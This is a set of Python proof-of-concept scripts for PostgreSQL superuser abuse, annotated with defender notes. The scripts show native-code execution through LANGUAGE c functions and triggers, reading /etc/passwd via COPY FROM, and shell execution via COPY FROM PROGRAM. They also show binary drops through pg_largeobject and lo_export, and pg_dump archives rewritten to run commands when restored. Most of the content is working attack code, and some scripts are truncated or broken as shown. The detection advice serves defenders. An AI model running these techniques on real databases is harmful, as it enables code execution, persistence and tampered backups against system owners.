# PoC script: registers a SQL function backed by a native shared object that
# must already exist on the *database server* host, then calls it so the
# library code runs inside the backend process.
# PostgreSQL only lets superusers create LANGUAGE c functions, so this is a
# post-compromise / over-privileged-role issue rather than a bypass.
# Defender notes: never give application roles superuser; alert on
# CREATE FUNCTION ... LANGUAGE c (especially with an absolute path outside
# $libdir) via statement logging or pgaudit.
from contextlib import closing  # NOTE(review): unused in this snippet
import psycopg2  # NOTE(review): unused here; presumably used inside util

# database/exec_psql are project helpers not shown on this page; presumably
# exec_psql runs the given statements in order against `db` — verify.
from util import database, exec_psql

with database('db'):
    exec_psql([
        # superuser-only: binds a SQL function to an arbitrary .so on the server
        """CREATE FUNCTION poc() RETURNS int as '/tmp/poc', 'pgfunc' LANGUAGE 'c' STRICT""",
        # invoking it executes the native code with the backend's OS privileges
        """SELECT poc()""",
    ],
              db='db')
# PoC script (two-phase, driven by argv): without arguments it creates the
# database and allocates a large object; with a large-object id as argv[1]
# it builds INSERT statements that write a local file's bytes directly into
# the pg_largeobject system catalog, 2 KiB per page.
# Writing to pg_largeobject directly (instead of via lo_put/lo_from_bytea)
# is a superuser-only catalog modification.
# Defender notes: alert on DML against pg_largeobject and on lo_export to
# paths outside the data directory; restrict superuser to DBAs only.
# NOTE(review): as shown on this page the script is truncated — `statements`
# is built but never passed to exec_psql.
from base64 import b64encode
from contextlib import closing  # NOTE(review): unused in this snippet
import os  # NOTE(review): unused in this snippet
import psycopg2  # NOTE(review): unused here; presumably used inside util
import re  # NOTE(review): unused in this snippet
from sys import argv

# project helpers not shown on this page; drop_database and database are
# imported but not used in the visible code
from util import create_database, drop_database, database, exec_psql

db_name = 'db'

if len(argv) == 1:
    # phase 1: create the database and allocate an empty large object;
    # the returned loid is expected to be passed back as argv[1]
    create_database(db_name)

    exec_psql(["""SELECT lo_creat(0)"""], db=db_name)
else:
    # phase 2: target an existing large object by id
    loid = int(argv[1])

    # payload file read from the client's working directory
    with open('function_poc', 'rb') as fp:
        data = fp.read()

    # one INSERT per 2048-byte page of the large object
    chunk_size = 2048
    statements = []

    for idx, chunk in enumerate(
        (data[i:i + chunk_size] for i in range(0, len(data), chunk_size))):
        b64 = b64encode(chunk)
        # SQL is assembled with str.format rather than bound parameters;
        # all inputs here are local (loid, page index, base64 text)
        statements.append(
            """INSERT INTO pg_largeobject (loid, pageno, data) VALUES ({}, {}, decode('{}', 'base64'))"""
            .format(str(loid), str(idx), b64))
# PoC script: reads a server-side file into a table with COPY FROM '<path>'.
# The path is resolved on the database server host, not the client.
# Server-side COPY FROM a file requires superuser or (PostgreSQL 11+) the
# pg_read_server_files role.
# Defender notes: grant pg_read_server_files only where genuinely needed and
# alert on COPY ... FROM '<absolute path>' in statement logs / pgaudit.
from contextlib import closing  # NOTE(review): unused in this snippet
import psycopg2  # NOTE(review): unused here; presumably used inside util

# project helpers not shown on this page; presumably exec_psql runs the
# statements in order against `db` — verify
from util import database, exec_psql


with database('db'):
    exec_psql([
        """CREATE TABLE dump (t TEXT)""",
        # server-side file read (superuser / pg_read_server_files)
        """COPY dump FROM '/etc/passwd'""",
        # only the first row is returned to the client
        """SELECT * from dump LIMIT 1"""
        ], db='db')
# PoC script: smuggles a local binary onto the server filesystem by storing
# it in a bytea column, writing that table out with COPY ... TO ... WITH
# BINARY, and then post-processing the written file with a shell command
# via COPY ... FROM PROGRAM.
# COPY TO a server path needs superuser or pg_write_server_files; COPY FROM
# PROGRAM runs the command as the postgres OS user and needs superuser or
# pg_execute_server_program (PostgreSQL 11+ roles).
# Defender notes: alert on any COPY ... PROGRAM and on COPY TO absolute
# paths outside the data directory; keep these roles off application
# accounts.
from base64 import b64encode
from contextlib import closing  # NOTE(review): unused in this snippet
import psycopg2  # NOTE(review): unused here; presumably used inside util

# project helpers not shown on this page; presumably exec_psql runs the
# statements in order against `db` — verify
from util import database, exec_psql


# payload read from the client's working directory and base64-encoded
with open('function_poc', 'rb') as fp:
    b64 = b64encode(fp.read())

with database('db'):
    exec_psql([
        """CREATE TABLE dump (t TEXT)""",
        """CREATE TABLE binaryData (b bytea)""",
        # SQL assembled with str.format (no bound parameters); input is local
        """INSERT INTO binaryData (b) values (decode('{}', 'base64'))""".format(b64),
        # server-side file write (superuser / pg_write_server_files)
        """COPY binaryData TO '/tmp/psql.bin' WITH BINARY""",
        # shell execution on the server (superuser / pg_execute_server_program)
        """COPY dump FROM PROGRAM 'tail -c +26 /tmp/psql.bin > /tmp/poc'""",
        ], db='db')
# PoC script (two-phase, driven by argv): without arguments it creates the
# database and allocates a large object; with a large-object id as argv[1]
# it builds statements that write a local file's bytes directly into the
# pg_largeobject system catalog and then export the object to a server path
# with lo_export.
# Direct writes to pg_largeobject are a superuser-only catalog modification,
# and lo_export to an arbitrary server path is likewise superuser-only.
# Defender notes: alert on DML against pg_largeobject and on lo_export
# targeting paths outside the data directory.
# NOTE(review): as shown on this page the script is truncated — `statements`
# is built but never passed to exec_psql.
from base64 import b64encode
from contextlib import closing  # NOTE(review): unused in this snippet
import psycopg2  # NOTE(review): unused here; presumably used inside util
from sys import argv

# project helpers not shown on this page; drop_database is imported but not
# used in the visible code
from util import create_database, drop_database, exec_psql

db_name = 'db'

if len(argv) == 1:
    # phase 1: create the database and allocate an empty large object;
    # the returned loid is expected to be passed back as argv[1]
    create_database(db_name)

    exec_psql(["""SELECT lo_creat(0)"""], db=db_name)
else:
    # phase 2: target an existing large object by id
    loid = int(argv[1])

    # payload file read from the client's working directory
    with open('function_poc', 'rb') as fp:
        data = fp.read()

    # one INSERT per 2048-byte page of the large object
    chunk_size = 2048
    statements = []

    for idx, chunk in enumerate(
        (data[i:i + chunk_size] for i in range(0, len(data), chunk_size))):
        b64 = b64encode(chunk)
        # SQL assembled with str.format rather than bound parameters;
        # all inputs here are local (loid, page index, base64 text)
        statements.append(
            """INSERT INTO pg_largeobject (loid, pageno, data) VALUES ({}, {}, decode('{}', 'base64'))"""
            .format(str(loid), str(idx), b64))

    # server-side file write of the assembled object (superuser-only)
    statements.append("""SELECT lo_export({}, '/tmp/lo_poc')""".format(loid))
# PoC script: runs a shell command on the database server with
# COPY ... FROM PROGRAM and reads the command's output back through a table.
# COPY FROM PROGRAM executes as the postgres OS user and requires superuser
# or the pg_execute_server_program role (PostgreSQL 11+).
# Defender notes: this is the standard indicator of a compromised or
# over-privileged DB role — alert on any COPY ... PROGRAM statement, and
# never grant pg_execute_server_program to application accounts.
from contextlib import closing  # NOTE(review): unused in this snippet
import psycopg2  # NOTE(review): unused here; presumably used inside util

# project helpers not shown on this page; presumably exec_psql runs the
# statements in order against `db` — verify
from util import database, exec_psql

with database('db'):
    exec_psql([
        """CREATE TABLE dump (t TEXT)""",
        # shell execution on the server (superuser / pg_execute_server_program)
        """COPY dump FROM PROGRAM 'uname -a'""",
        # first line of the command output is returned to the client
        """SELECT * from dump LIMIT 1"""
    ],
              db='db')
# PoC script: runs a shell command on the database server with
# COPY ... FROM PROGRAM, writes the captured output to a server-side file
# with COPY ... TO, then opens that same path locally — so this variant
# assumes the client runs on the same host as the server.
# COPY FROM PROGRAM needs superuser or pg_execute_server_program; COPY TO a
# server path needs superuser or pg_write_server_files (PostgreSQL 11+).
# Defender notes: alert on COPY ... PROGRAM and on COPY TO paths outside
# the data directory.
from contextlib import closing  # NOTE(review): unused in this snippet
import psycopg2  # NOTE(review): unused here; presumably used inside util

# project helpers not shown on this page; presumably exec_psql runs the
# statements in order against `db` — verify
from util import database, exec_psql

with database('db'):
    exec_psql([
        """CREATE TABLE dump (t TEXT)""",
        # shell execution on the server (superuser / pg_execute_server_program)
        """COPY dump FROM PROGRAM 'uname -a'""",
        # server-side file write (superuser / pg_write_server_files)
        """COPY dump to '/tmp/dump.txt'"""
    ],
              db='db')

# read back from the local filesystem: only works if client and server
# share a host (or /tmp)
with open('/tmp/dump.txt', 'r') as fp:
    print(fp.read())
# PoC script: registers a trigger function backed by a native shared object
# that must already exist on the server host, attaches it to a table, and
# fires it with a single INSERT.
# Creating LANGUAGE c functions is superuser-only; once attached, the
# trigger runs the library code on every qualifying row change, so it also
# serves as a persistence mechanism.
# Defender notes: alert on CREATE FUNCTION ... LANGUAGE c and on CREATE
# TRIGGER statements from non-DBA roles; periodically review pg_trigger and
# pg_proc for functions pointing at unexpected library paths.
from contextlib import closing  # NOTE(review): unused in this snippet
import psycopg2  # NOTE(review): unused here; presumably used inside util

# project helpers not shown on this page; presumably exec_psql runs the
# statements in order against `db` — verify
from util import database, exec_psql

with database('db'):
    exec_psql([
        """CREATE TABLE dump (t TEXT)""",
        # superuser-only: trigger function bound to an arbitrary .so
        """CREATE FUNCTION poc() RETURNS TRIGGER AS '/tmp/trigger_poc', 'pgtrigger' LANGUAGE 'c' STRICT""",
        # runs before every inserted row
        """CREATE TRIGGER poc BEFORE INSERT ON dump FOR EACH ROW EXECUTE FUNCTION poc()""",
        # fires the trigger once
        """INSERT INTO dump (t) VALUES ('random')"""
    ],
              db='db')
# PoC script: produces a tampered pg_dump custom-format archive. It creates
# a table and a sequence, takes a dump, rewrites the sequence-setting
# SELECT inside the archive into a COPY ... FROM PROGRAM statement, and
# cleans up the schema objects. Anyone who later restores the modified
# archive with sufficient privilege gets that command executed on the
# restoring server.
# Defender notes: treat dump files as untrusted input — protect them with
# signatures/hashes and restricted storage, inspect archives before restore
# (e.g. `pg_restore -l`), and restore as a role that lacks
# pg_execute_server_program wherever possible.
from contextlib import closing  # NOTE(review): unused in this snippet
import os
import psycopg2  # NOTE(review): unused here; presumably used inside util
import re

# project helpers not shown on this page; database is imported but not used
from util import database, exec_psql


# schema objects whose dump entries will be rewritten below; the large
# START value makes the sequence's SELECT line easy to locate in the archive
exec_psql([
    """CREATE TABLE public.dump (t TEXT)""",
    """CREATE SEQUENCE seq START 10000000000000""",
    """SELECT nextval('seq')"""])

fname = 'copy.dump'

# shell string via os.system (no argument list); relies on the caller's
# environment for the postgres user's credentials
os.system('pg_dump -U postgres -Fc > {}'.format(fname)) 

with open(fname, 'rb') as fp:
    data = fp.read()

# replaces the sequence-setting statement in the archive with a command
# execution statement that will run at restore time
repl = re.sub('(SELECT.*public.seq\x27.*;)', "COPY public.dump FROM PROGRAM 'touch /tmp/command_execution';", data)

with open(fname, 'wb') as fp:
    fp.write(repl)

# cleanup of the helper objects; the tampered archive is left on disk
exec_psql([
    """DROP TABLE public.dump""",
    """DROP SEQUENCE seq"""])
# PoC script: variant of the tampered-dump technique that also stores a
# local binary in a bytea table so the rewritten archive entry writes it to
# a server path (COPY ... TO ... WITH BINARY) at restore time. The extra
# sequences with very large START values act as padding so the rewritten
# line fits the archive layout.
# Defender notes: same as for any dump tampering — integrity-protect
# archives, inspect them before restore (`pg_restore -l`), and restore
# without superuser / pg_write_server_files where possible.
# NOTE(review): as shown on this page the script is truncated (the rewritten
# archive is never written back), and b64encode is used below without being
# imported, which would raise NameError as shown.
from contextlib import closing  # NOTE(review): unused in this snippet
import os
import psycopg2  # NOTE(review): unused here; presumably used inside util
import re

# project helpers not shown on this page; database is imported but not used
from util import database, exec_psql

# payload read from the client's working directory and base64-encoded
with open('function_poc', 'rb') as fp:
    b64 = b64encode(fp.read())

# SQL assembled with str.format (no bound parameters); input is local
exec_psql([
    """CREATE TABLE public.dump (t TEXT)""",
    """CREATE TABLE public.binary (b bytea)""",
    """INSERT INTO public.binary (b) values (decode('{}', 'base64'))""".format(
        b64), """CREATE SEQUENCE seq START 1""", """SELECT nextval('seq')""",
    """CREATE SEQUENCE seq_b START 100000000000000000""",
    """SELECT nextval('seq_b')""",
    """CREATE SEQUENCE seq_padded_out_for_names START 10000000000000000""",
    """SELECT nextval('seq_padded_out_for_names')""",
    """CREATE SEQUENCE seq_z START 1""", """SELECT nextval('seq_z')"""
])

fname = 'bin_func.dump'

# shell string via os.system (no argument list); relies on the caller's
# environment for the postgres user's credentials
os.system('pg_dump -U postgres -Fc > {}'.format(fname))

with open(fname, 'rb') as fp:
    data = fp.read()

# replaces the sequence-setting statement in the archive with a server-side
# file write that will run at restore time (superuser / pg_write_server_files)
repl = re.sub('(SELECT.*public.seq\x27.*;)',
              "COPY public.binary TO '/tmp/binary' WITH BINARY;", data)